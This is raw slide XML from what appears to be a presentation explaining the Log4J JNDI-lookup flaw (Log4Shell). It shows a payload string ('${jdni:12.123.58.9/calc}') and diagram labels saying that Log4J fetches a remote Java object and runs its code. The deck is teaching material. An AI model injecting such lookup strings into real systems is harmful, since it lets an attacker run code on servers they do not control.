                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="101418"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remote_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="101418"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;/path/to/file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371013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E063B50-05FF-1075-C570-7F1C79EC91B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E61E4AF6-BB34-77A3-C81C-ED4832BCD057}"/>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4BA5AA94-A412-FF09-F832-6153186FFC7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B7EF7029-F212-6EC6-6341-4F2E6AB470A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63B88974-E856-1544-D231-82DC12C26CB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D69719A-FD1E-4244-6F58-741C2A30F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7E62DCEC-3F62-45DD-5B84-667DF902AC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FAE15700-1C55-54D6-BD09-1E44798310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817A1FDA-3F42-8422-AAA3-EDDEA81D13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EA192C7E-C3B4-DFC5-F417-19822AE89F1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EB6A96F-A879-3727-5DBB-A88491AC49F6}"/>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FB6660-B49B-6F5E-5CFC-27F70A210E96}"/>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DF147F69-CCC0-C5DD-525F-472DC48DAC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39A8F610-B2DB-0B7D-94BB-FCD4A5AD7F0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11C4AFF8-2444-3ED8-BCB9-566A39ABE94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A0BA46D5-091A-DB7B-5510-4FE6F081283C}"/>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4EB676-F660-FE60-1926-295ED5FD497E}"/>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0805D8E3-08E1-A113-542B-FDBA9E045DEE}"/>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0B4529EE-7F72-09F9-15C3-F30A41593F98}"/>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948C3B3B-0278-E328-1B1F-9CDCAE2AEE0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8A9DBF7E-8975-F381-9930-B15668C43052}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2950740" y="2505855"/>
              <a:ext cx="117720" cy="115920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A9DBF7E-8975-F381-9930-B15668C43052}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId10"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2914740" y="2469743"/>
                <a:ext cx="189360" cy="187783"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E00FD1A2-8D24-E9DE-6F02-F24683D3E7CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4098024" y="1688228"/>
            <a:ext cx="3877985" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${jdni:12.123.58.9/calc}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle: Rounded Corners 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89EC2136-FBF0-02CD-EFF0-16337FC06EA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8078480" y="2976584"/>
            <a:ext cx="1045661" cy="103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CC668B1-E32C-CC31-1C6F-5ED8E7A92ED4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3181155"/>
            <a:ext cx="1937373" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Object that Summons a calculator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Calculator - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3E7ED71-1D4F-C78C-3203-461DEB0639D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79653" y="3122240"/>
            <a:ext cx="747594" cy="74759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6400B3C-8DAD-58E5-8C2D-AB0AC4ED2B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334160" y="5287832"/>
            <a:ext cx="11295080" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If a JDNI lookup is wrapped in a string expression, Log4J will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> that lookup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86F8D8CA-E870-6D60-E8E0-BF79C91CD644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="12261"/>
            <a:ext cx="6119812" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>12.123.58.9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371589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95BE3D2-3DBB-39BD-D578-059F9156B873}"/>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A3827E8A-2606-E06E-3E70-CDC33583A1EA}"/>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E0A324BF-CBA1-CB81-6C7F-C7CDC0405F11}"/>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8C1F9CD3-D284-1086-1ABD-EF1C6A34138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C2263A33-BFB9-8608-607C-3AD5050EA0C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{752374D7-31C1-41CE-DFE6-C515D4018D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E438BCDE-BB41-DEB4-BA64-C751441607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75AA8227-B2FF-A667-05E6-571A8CF39F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44C435AA-BB0D-D927-1399-E958783808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44C8C43E-23E3-57A2-5716-6E6A463F6C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86F5A9A-93BD-FCFC-23D1-417EC84D0303}"/>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E14439-7330-A5A3-C7D9-128703D21A1E}"/>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C9061352-29B2-7EA2-542C-A3F488D942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0F76B269-9ECB-0072-3F0D-B45A21D3C4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6E81BDD2-1030-71E9-51E7-081400527C8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364F28F5-604E-D7B4-E81E-01EEC62D6F3F}"/>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24377E-9893-3779-E6B3-9D1D75FF6119}"/>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3055D249-54A0-16D2-7719-7DE7CC0BC15C}"/>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D3A13E84-CAB1-4A0D-4322-01D62D9AC902}"/>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CE919546-098F-C1F7-F952-B4F666E00CF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B88BDBF2-FA82-BC39-302A-9C4C49D7F245}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729627" y="3595301"/>
            <a:ext cx="2416046" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="282821"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${jdni:12.123.58.9/calc}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle: Rounded Corners 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAB0DD4F-4AD5-D727-1FEC-7D2E758DDFD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8078480" y="2976584"/>
            <a:ext cx="1045661" cy="103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831C8E7-EB97-26A5-BE7D-47A7C92442CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3181155"/>
            <a:ext cx="1937373" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Object that Summons a calculator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Calculator - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2026DC2-3121-0356-E9B6-20BD5F236AA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9653" y="3122240"/>
            <a:ext cx="747594" cy="74759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BF0CB9AA-7C1D-3EA1-2D90-F74F3273CA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379267" y="5956287"/>
            <a:ext cx="11295080" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If a JDNI lookup is wrapped in a string expression, Log4J will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> that lookup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{663D8122-80BE-A7E3-5BC8-C68216C219F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="12261"/>
            <a:ext cx="6119812" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>12.123.58.9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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D34971B-AE9D-684A-9408-16E8B7E6629C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3057660" y="2532540"/>
              <a:ext cx="4953240" cy="1355760"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="9" name="Ink 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D34971B-AE9D-684A-9408-16E8B7E6629C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3021660" y="2496900"/>
                <a:ext cx="5024880" cy="1427400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{160D48AA-C435-A930-9F76-76AFD0613484}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="689640">
            <a:off x="4012944" y="3116191"/>
            <a:ext cx="3031599" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fetches and loads into JVM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146991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63C48A1-4E8F-B349-8D3D-A6BB4798A47C}"/>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10BB317F-2B78-5518-D66C-E91E688E1388}"/>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E6DC74A7-CCB2-D6C6-2D30-B66317249471}"/>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6E60C066-B417-DC62-BFDF-11F60063377B}"/>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0731182D-08CB-7697-79B6-013E542D6622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CDCBC7B-A430-1694-9154-BF7890F95E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CFE3C439-8242-26F8-BFDF-6BB7EFB43A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B907F70A-0FE6-05D4-AB66-A519367928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64FB2015-996A-7F3B-94E1-7FD4124F77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56A42394-22F9-48C3-4CD5-F0CF2006CA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588800-B1D0-A788-5D56-0A80D5A6854A}"/>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F5D134-758C-F1C5-3ADF-F4734DC422D6}"/>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1C759BAB-B20C-2647-31A8-CB26104B53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9BE22C1E-FF71-B067-A425-D87ABF0A3BC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CB6AC72D-84CC-FF7F-2579-8267DE87CD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A1746AD5-72AA-4D2D-0393-B85524FB62EA}"/>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3080E89-4994-0B74-83A0-69ED23B9C0DE}"/>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B5DEC713-47E3-E737-EDCC-F99EC976C40A}"/>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CDE8E09C-5B49-BBD3-7213-BDD4BB6BE5AC}"/>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05188E23-D201-C2A0-23D2-D318F58B9B7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BA2B92B5-FB90-2A9F-C407-4D3A4808362C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729627" y="3595301"/>
            <a:ext cx="2416046" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="282821"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${jdni:12.123.58.9/calc}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle: Rounded Corners 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8975DFEE-133B-CE8C-C53D-5B55491DC7B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8078480" y="2976584"/>
            <a:ext cx="1045661" cy="103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230F9AE-B38F-B81B-8194-D75FDF922006}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144000" y="3181155"/>
            <a:ext cx="1937373" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Object that Summons a calculator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="Calculator - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60F71798-03F2-BAA3-EB52-77E3A532DD6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9653" y="3122240"/>
            <a:ext cx="747594" cy="74759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195D505D-9DD6-2AA6-F5E9-48734782FADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379267" y="5956287"/>
            <a:ext cx="11295080" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If a JDNI lookup is wrapped in a string expression, Log4J will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> that lookup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{587546FD-3A39-60D7-907B-5B9CBDCB56DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="12261"/>
            <a:ext cx="6119812" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>12.123.58.9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle: Rounded Corners 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A5D2C3F-561A-6B0B-6D5B-D6018D6FEE5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2878742" y="2483782"/>
            <a:ext cx="1045661" cy="103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Calculator - Free technology icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AFBF09B-EE51-BAC9-A6C8-25414113B5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9915" y="2629438"/>
            <a:ext cx="747594" cy="7475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FF3F1CF-AEBD-2EBD-4AD3-FB0200ECFC65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2317016" y="4817573"/>
            <a:ext cx="5043368" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The code of that object is executed!</a:t>
